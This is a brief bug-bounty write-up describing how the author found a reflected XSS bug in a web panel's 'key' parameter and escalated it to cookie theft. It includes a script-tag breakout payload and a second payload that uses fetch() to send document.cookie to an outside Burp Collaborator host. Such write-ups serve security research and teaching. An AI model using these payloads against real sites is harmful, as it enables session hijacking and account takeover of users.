XSS Steal Cookies

Hello hackers, I’m Mostafa Elguerdawi, in this Write-up I’ll explain how I was able to steal users’ cookies via XSS.

I’ll mention my target as target.com

The first thing I always do is browse the application and try to understand how it works, By create account and do some actions on it.

After creating a new account and browsing many pages, I found this endpoint https://target.com/Panel?obs=Yes&idPanel=564&key=465&rOTree=Y&rn=

in idPanel and key parameters I tried SQL injection but didn’t work, So I decided to view source code for the page and I fond this

I said what about XSS in this parameters?

I tried in idPanel but unfortunately it didn’t work, But in parameter key there is no filter.

I able to inject XSS payload on it, Now the real challenge.

This code is reflected in the source code but unfortunately it doesn’t execute because of the function windowReload

So I need to escape this function and get out of it.

After some time trieng to close the function and start new one without any success, I thought what if I closed the script tag itself not only the function.

So I used payload : “} </script><script>alert(“XSS_By_Mostafa_Elguerdawi”)</script>//

• “} : to escape the function
• </script> : to close the <script> that in original code

And It worked as I expect!!

Steal Users Cookie

After get the XSS I tried to alert my cookie to see if there is httpOnlyflag or not but it seems not and I able to get cookies.

By some help from Burp Collaborator I managed to get any one cookie by sending him the URL.

payload I use :

"} </script> <script>fetch('https://<Collaborator>', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>//

After couple seconds I got the response to my collaberator with victim cookies.